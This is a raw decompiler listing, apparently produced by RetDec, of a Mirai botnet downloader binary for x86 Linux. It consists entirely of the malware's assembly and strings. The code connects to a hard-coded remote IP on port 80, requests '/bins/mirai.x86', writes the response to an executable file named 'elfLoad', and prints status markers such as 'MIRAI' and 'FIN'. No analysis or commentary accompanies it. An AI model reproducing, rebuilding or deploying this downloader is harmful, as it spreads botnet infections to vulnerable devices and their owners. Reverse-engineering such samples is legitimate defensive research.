;;
;; This file was generated by the Retargetable Decompiler
;; Website: https://retdec.com
;; Copyright (c) 2018 Retargetable Decompiler <info@retdec.com>
;;
;; Decompilation date: 2018-03-24 22:28:58
;; Architecture: x86 (or later and compatible)
;;

;;
;; Code Segment
;;

; section: .text
; function: function_8048094 at 0x8048094 -- 0x80480db
0x8048094:   55                     	push ebp
0x8048095:   89 e5                  	mov ebp, esp
0x8048097:   0f b6 55 08            	movzx edx, byte ptr [ebp + 8]
0x804809b:   0f b6 45 0c            	movzx eax, byte ptr [ebp + 0xc]
0x804809f:   c1 e2 18               	shl edx, 0x18
0x80480a2:   c1 e0 10               	shl eax, 0x10
0x80480a5:   09 c2                  	or edx, eax
0x80480a7:   0f b6 4d 10            	movzx ecx, byte ptr [ebp + 0x10]
0x80480ab:   0f b6 45 14            	movzx eax, byte ptr [ebp + 0x14]
0x80480af:   c1 e1 08               	shl ecx, 8
0x80480b2:   09 c2                  	or edx, eax
0x80480b4:   09 d1                  	or ecx, edx
0x80480b6:   5d                     	pop ebp
0x80480b7:   89 ca                  	mov edx, ecx
0x80480b9:   89 c8                  	mov eax, ecx
0x80480bb:   c1 e0 18               	shl eax, 0x18
0x80480be:   81 e2 00 ff 00 00      	and edx, 0xff00
0x80480c4:   c1 e2 08               	shl edx, 8
0x80480c7:   09 d0                  	or eax, edx
0x80480c9:   89 ca                  	mov edx, ecx
0x80480cb:   c1 ea 18               	shr edx, 0x18
0x80480ce:   81 e1 00 00 ff 00      	and ecx, 0xff0000
0x80480d4:   c1 e9 08               	shr ecx, 8
0x80480d7:   09 ca                  	or edx, ecx
0x80480d9:   09 d0                  	or eax, edx
0x80480db:   c3                     	ret 
; function: function_80480dc at 0x80480dc -- 0x80480f0
0x80480dc:   55                     	push ebp
0x80480dd:   89 e5                  	mov ebp, esp
0x80480df:   83 ec 10               	sub esp, 0x10
0x80480e2:   ff 75 08               	push dword ptr [ebp + 8]
0x80480e5:   6a 01                  	push 1
0x80480e7:   e8 40 02 00 00         	call 0x804832c <function_804832c>
0x80480ec:   83 c4 10               	add esp, 0x10
0x80480ef:   c9                     	leave 
0x80480f0:   c3                     	ret 
; function: function_80480f1 at 0x80480f1 -- 0x8048102
0x80480f1:   55                     	push ebp
0x80480f2:   89 e5                  	mov ebp, esp
0x80480f4:   83 ec 10               	sub esp, 0x10
0x80480f7:   ff 75 08               	push dword ptr [ebp + 8]
0x80480fa:   6a 06                  	push 6
0x80480fc:   e8 2b 02 00 00         	call 0x804832c <function_804832c>
0x8048101:   c9                     	leave 
0x8048102:   c3                     	ret 
; function: function_8048103 at 0x8048103 -- 0x804811a
0x8048103:   55                     	push ebp
0x8048104:   89 e5                  	mov ebp, esp
0x8048106:   83 ec 08               	sub esp, 8
0x8048109:   ff 75 10               	push dword ptr [ebp + 0x10]
0x804810c:   ff 75 0c               	push dword ptr [ebp + 0xc]
0x804810f:   ff 75 08               	push dword ptr [ebp + 8]
0x8048112:   6a 05                  	push 5
0x8048114:   e8 13 02 00 00         	call 0x804832c <function_804832c>
0x8048119:   c9                     	leave 
0x804811a:   c3                     	ret 
; function: function_804811b at 0x804811b -- 0x8048141
0x804811b:   55                     	push ebp
0x804811c:   89 e5                  	mov ebp, esp
0x804811e:   83 ec 1c               	sub esp, 0x1c
0x8048121:   8b 45 08               	mov eax, dword ptr [ebp + 8]
0x8048124:   89 45 f4               	mov dword ptr [ebp - 0xc], eax
0x8048127:   8b 45 0c               	mov eax, dword ptr [ebp + 0xc]
0x804812a:   89 45 f8               	mov dword ptr [ebp - 8], eax
0x804812d:   8b 45 10               	mov eax, dword ptr [ebp + 0x10]
0x8048130:   89 45 fc               	mov dword ptr [ebp - 4], eax
0x8048133:   8d 45 f4               	lea eax, [ebp - 0xc]
0x8048136:   50                     	push eax
0x8048137:   6a 03                  	push 3
0x8048139:   6a 66                  	push 0x66
0x804813b:   e8 ec 01 00 00         	call 0x804832c <function_804832c>
0x8048140:   c9                     	leave 
0x8048141:   c3                     	ret 
; function: function_8048142 at 0x8048142 -- 0x8048159
0x8048142:   55                     	push ebp
0x8048143:   89 e5                  	mov ebp, esp
0x8048145:   83 ec 08               	sub esp, 8
0x8048148:   ff 75 10               	push dword ptr [ebp + 0x10]
0x804814b:   ff 75 0c               	push dword ptr [ebp + 0xc]
0x804814e:   ff 75 08               	push dword ptr [ebp + 8]
0x8048151:   6a 04                  	push 4
0x8048153:   e8 d4 01 00 00         	call 0x804832c <function_804832c>
0x8048158:   c9                     	leave 
0x8048159:   c3                     	ret 
; function: function_804815a at 0x804815a -- 0x8048171
0x804815a:   55                     	push ebp
0x804815b:   89 e5                  	mov ebp, esp
0x804815d:   83 ec 08               	sub esp, 8
0x8048160:   ff 75 10               	push dword ptr [ebp + 0x10]
0x8048163:   ff 75 0c               	push dword ptr [ebp + 0xc]
0x8048166:   ff 75 08               	push dword ptr [ebp + 8]
0x8048169:   6a 03                  	push 3
0x804816b:   e8 bc 01 00 00         	call 0x804832c <function_804832c>
0x8048170:   c9                     	leave 
0x8048171:   c3                     	ret 
; function: function_8048172 at 0x8048172 -- 0x8048198
0x8048172:   55                     	push ebp
0x8048173:   89 e5                  	mov ebp, esp
0x8048175:   83 ec 1c               	sub esp, 0x1c
0x8048178:   8b 45 08               	mov eax, dword ptr [ebp + 8]
0x804817b:   89 45 f4               	mov dword ptr [ebp - 0xc], eax
0x804817e:   8b 45 0c               	mov eax, dword ptr [ebp + 0xc]
0x8048181:   89 45 f8               	mov dword ptr [ebp - 8], eax
0x8048184:   8b 45 10               	mov eax, dword ptr [ebp + 0x10]
0x8048187:   89 45 fc               	mov dword ptr [ebp - 4], eax
0x804818a:   8d 45 f4               	lea eax, [ebp - 0xc]
0x804818d:   50                     	push eax
0x804818e:   6a 01                  	push 1
0x8048190:   6a 66                  	push 0x66
0x8048192:   e8 95 01 00 00         	call 0x804832c <function_804832c>
0x8048197:   c9                     	leave 
0x8048198:   c3                     	ret 
; function: function_8048199 at 0x8048199 -- 0x8048320
0x8048199:   55                     	push ebp
0x804819a:   b8 79 83 04 08         	mov eax, 0x8048379 ; "x86"
0x804819f:   89 e5                  	mov ebp, esp
0x80481a1:   57                     	push edi
0x80481a2:   56                     	push esi
0x80481a3:   53                     	push ebx
0x80481a4:   81 ec ac 00 00 00      	sub esp, 0xac
0x80481aa:   eb 01                  	jmp 0x80481ad <function_8048199+0x14>
0x80481ac:   40                     	inc eax
0x80481ad:   80 38 00               	cmp byte ptr [eax], 0
0x80481b0:   75 fa                  	jne 0x80481ac <function_8048199+0x13>
0x80481b2:   2d 79 83 04 08         	sub eax, 0x8048379 ; "x86"
0x80481b7:   89 85 50 ff ff ff      	mov dword ptr [ebp - 0xb0], eax
0x80481bd:   50                     	push eax
0x80481be:   6a 06                  	push 6
0x80481c0:   68 7d 83 04 08         	push 0x804837d ; "MIRAI\n"
0x80481c5:   6a 01                  	push 1
0x80481c7:   e8 76 ff ff ff         	call 0x8048142 <function_8048142>
0x80481cc:   6a 6d                  	push 0x6d
0x80481ce:   66 c7 45 e0 02 00      	mov word ptr [ebp - 0x20], 2
0x80481d4:   68 bd 00 00 00         	push 0xbd
0x80481d9:   66 c7 45 e2 00 50      	mov word ptr [ebp - 0x1e], 0x5000
0x80481df:   68 f3 00 00 00         	push 0xf3
0x80481e4:   6a 2e                  	push 0x2e
0x80481e6:   e8 a9 fe ff ff         	call 0x8048094 <function_8048094>
0x80481eb:   83 c4 1c               	add esp, 0x1c
0x80481ee:   89 45 e4               	mov dword ptr [ebp - 0x1c], eax
0x80481f1:   68 ff 01 00 00         	push 0x1ff
0x80481f6:   68 41 02 00 00         	push 0x241
0x80481fb:   68 84 83 04 08         	push 0x8048384 ; "elfLoad"
0x8048200:   e8 fe fe ff ff         	call 0x8048103 <function_8048103>
0x8048205:   83 c4 0c               	add esp, 0xc
0x8048208:   89 c7                  	mov edi, eax
0x804820a:   6a 00                  	push 0
0x804820c:   6a 01                  	push 1
0x804820e:   6a 02                  	push 2
0x8048210:   e8 5d ff ff ff         	call 0x8048172 <function_8048172>
0x8048215:   83 c4 10               	add esp, 0x10
0x8048218:   89 c6                  	mov esi, eax
0x804821a:   83 f8 ff               	cmp eax, -1
0x804821d:   74 05                  	je 0x8048224 <function_8048199+0x8b>
0x804821f:   83 ff ff               	cmp edi, -1
0x8048222:   75 0d                  	jne 0x8048231 <function_8048199+0x98>
0x8048224:   83 ec 0c               	sub esp, 0xc
0x8048227:   6a 01                  	push 1
0x8048229:   e8 ae fe ff ff         	call 0x80480dc <function_80480dc>
0x804822e:   83 c4 10               	add esp, 0x10
0x8048231:   50                     	push eax
0x8048232:   8d 45 e0               	lea eax, [ebp - 0x20]
0x8048235:   6a 10                  	push 0x10
0x8048237:   50                     	push eax
0x8048238:   56                     	push esi
0x8048239:   e8 dd fe ff ff         	call 0x804811b <function_804811b>
0x804823e:   83 c4 10               	add esp, 0x10
0x8048241:   89 c3                  	mov ebx, eax
0x8048243:   85 c0                  	test eax, eax
0x8048245:   79 1c                  	jns 0x8048263 <function_8048199+0xca>
0x8048247:   f7 db                  	neg ebx
0x8048249:   50                     	push eax
0x804824a:   6a 04                  	push 4
0x804824c:   68 8c 83 04 08         	push 0x804838c ; "NIF\n"
0x8048251:   6a 01                  	push 1
0x8048253:   e8 ea fe ff ff         	call 0x8048142 <function_8048142>
0x8048258:   89 1c 24               	mov dword ptr [esp], ebx
0x804825b:   e8 7c fe ff ff         	call 0x80480dc <function_80480dc>
0x8048260:   83 c4 10               	add esp, 0x10
0x8048263:   8b 9d 50 ff ff ff      	mov ebx, dword ptr [ebp - 0xb0]
0x8048269:   50                     	push eax
0x804826a:   83 c3 1d               	add ebx, 0x1d
0x804826d:   53                     	push ebx
0x804826e:   68 91 83 04 08         	push 0x8048391 ; "GET /bins/mirai.x86 HTTP/1.0\r\n\r\n"
0x8048273:   56                     	push esi
0x8048274:   e8 c9 fe ff ff         	call 0x8048142 <function_8048142>
0x8048279:   83 c4 10               	add esp, 0x10
0x804827c:   39 d8                  	cmp eax, ebx
0x804827e:   74 0d                  	je 0x804828d <function_8048199+0xf4>
0x8048280:   83 ec 0c               	sub esp, 0xc
0x8048283:   6a 03                  	push 3
0x8048285:   e8 52 fe ff ff         	call 0x80480dc <function_80480dc>
0x804828a:   83 c4 10               	add esp, 0x10
0x804828d:   31 db                  	xor ebx, ebx
0x804828f:   50                     	push eax
0x8048290:   8d 45 f3               	lea eax, [ebp - 0xd]
0x8048293:   6a 01                  	push 1
0x8048295:   50                     	push eax
0x8048296:   56                     	push esi
0x8048297:   e8 be fe ff ff         	call 0x804815a <function_804815a>
0x804829c:   83 c4 10               	add esp, 0x10
0x804829f:   48                     	dec eax
0x80482a0:   74 0d                  	je 0x80482af <function_8048199+0x116>
0x80482a2:   83 ec 0c               	sub esp, 0xc
0x80482a5:   6a 04                  	push 4
0x80482a7:   e8 30 fe ff ff         	call 0x80480dc <function_80480dc>
0x80482ac:   83 c4 10               	add esp, 0x10
0x80482af:   0f be 45 f3            	movsx eax, byte ptr [ebp - 0xd]
0x80482b3:   c1 e3 08               	shl ebx, 8
0x80482b6:   09 c3                  	or ebx, eax
0x80482b8:   81 fb 0a 0d 0a 0d      	cmp ebx, 0xd0a0d0a
0x80482be:   75 cf                  	jne 0x804828f <function_8048199+0xf6>
0x80482c0:   8d 9d 60 ff ff ff      	lea ebx, [ebp - 0xa0]
0x80482c6:   51                     	push ecx
0x80482c7:   68 80 00 00 00         	push 0x80
0x80482cc:   53                     	push ebx
0x80482cd:   56                     	push esi
0x80482ce:   e8 87 fe ff ff         	call 0x804815a <function_804815a>
0x80482d3:   83 c4 10               	add esp, 0x10
0x80482d6:   85 c0                  	test eax, eax
0x80482d8:   7e 0e                  	jle 0x80482e8 <function_8048199+0x14f>
0x80482da:   52                     	push edx
0x80482db:   50                     	push eax
0x80482dc:   53                     	push ebx
0x80482dd:   57                     	push edi
0x80482de:   e8 5f fe ff ff         	call 0x8048142 <function_8048142>
0x80482e3:   83 c4 10               	add esp, 0x10
0x80482e6:   eb d8                  	jmp 0x80482c0 <function_8048199+0x127>
0x80482e8:   83 ec 0c               	sub esp, 0xc
0x80482eb:   56                     	push esi
0x80482ec:   e8 00 fe ff ff         	call 0x80480f1 <function_80480f1>
0x80482f1:   89 3c 24               	mov dword ptr [esp], edi
0x80482f4:   e8 f8 fd ff ff         	call 0x80480f1 <function_80480f1>
0x80482f9:   83 c4 0c               	add esp, 0xc
0x80482fc:   6a 04                  	push 4
0x80482fe:   68 b2 83 04 08         	push 0x80483b2 ; "FIN\n"
0x8048303:   6a 01                  	push 1
0x8048305:   e8 38 fe ff ff         	call 0x8048142 <function_8048142>
0x804830a:   c7 04 24 05 00 00 00   	mov dword ptr [esp], 5
0x8048311:   e8 c6 fd ff ff         	call 0x80480dc <function_80480dc>
0x8048316:   83 c4 10               	add esp, 0x10
0x8048319:   8d 65 f4               	lea esp, [ebp - 0xc]
0x804831c:   5b                     	pop ebx
0x804831d:   5e                     	pop esi
0x804831e:   5f                     	pop edi
0x804831f:   5d                     	pop ebp
0x8048320:   c3                     	ret 
; function: entry_point at 0x8048321 -- 0x804832b
0x8048321:   55                     	push ebp
0x8048322:   89 e5                  	mov ebp, esp
0x8048324:   5d                     	pop ebp
0x8048325:   e9 6f fe ff ff         	jmp 0x8048199 <function_8048199>
; data inside code section at 0x804832a -- 0x804832c
0x804832a:   90 90                                              |..              |
; function: function_804832c at 0x804832c -- 0x8048372
0x804832c:   55                     	push ebp
0x804832d:   57                     	push edi
0x804832e:   56                     	push esi
0x804832f:   53                     	push ebx
0x8048330:   8b 6c 24 2c            	mov ebp, dword ptr [esp + 0x2c]
0x8048334:   8b 7c 24 28            	mov edi, dword ptr [esp + 0x28]
0x8048338:   8b 74 24 24            	mov esi, dword ptr [esp + 0x24]
0x804833c:   8b 54 24 20            	mov edx, dword ptr [esp + 0x20]
0x8048340:   8b 4c 24 1c            	mov ecx, dword ptr [esp + 0x1c]
0x8048344:   8b 5c 24 18            	mov ebx, dword ptr [esp + 0x18]
0x8048348:   8b 44 24 14            	mov eax, dword ptr [esp + 0x14]
0x804834c:   cd 80                  	int 0x80
0x804834e:   5b                     	pop ebx
0x804834f:   5e                     	pop esi
0x8048350:   5f                     	pop edi
0x8048351:   5d                     	pop ebp
0x8048352:   3d 01 f0 ff ff         	cmp eax, 0xfffff001
0x8048357:   0f 83 01 00 00 00      	jae 0x804835e <function_804832c+0x32>
0x804835d:   c3                     	ret 
0x804835e:   83 ec 0c               	sub esp, 0xc
0x8048361:   89 c2                  	mov edx, eax
0x8048363:   f7 da                  	neg edx
0x8048365:   e8 09 00 00 00         	call 0x8048373 <function_8048373>
0x804836a:   89 10                  	mov dword ptr [eax], edx
0x804836c:   83 c8 ff               	or eax, 0xffffffff
0x804836f:   83 c4 0c               	add esp, 0xc
0x8048372:   c3                     	ret 
; function: function_8048373 at 0x8048373 -- 0x8048378
0x8048373:   b8 b8 93 04 08         	mov eax, 0x80493b8
0x8048378:   c3                     	ret 

;;
;; Data Segment
;;

; section: .rodata
0x8048379:   78 38 36 00                                        |x86.            |   "x86"
0x804837d:   4d 49 52 41 49 0a 00                               |MIRAI..         |   "MIRAI\n"
0x8048384:   65 6c 66 4c 6f 61 64 00                            |elfLoad.        |   "elfLoad"
0x804838c:   4e 49 46 0a 00                                     |NIF..           |   "NIF\n"
0x8048391:   47 45 54 20 2f 62 69 6e  73 2f 6d 69 72 61 69 2e   |GET /bins/mirai.|   "GET /bins/mirai.x86 HTTP/1.0\r\n\r\n"
0x80483a1:   78 38 36 20 48 54 54 50  2f 31 2e 30 0d 0a 0d 0a   |x86 HTTP/1.0....|
0x80483b1:   00                                                 |.               |
0x80483b2:   46 49 4e 0a 00                                     |FIN..           |   "FIN\n"
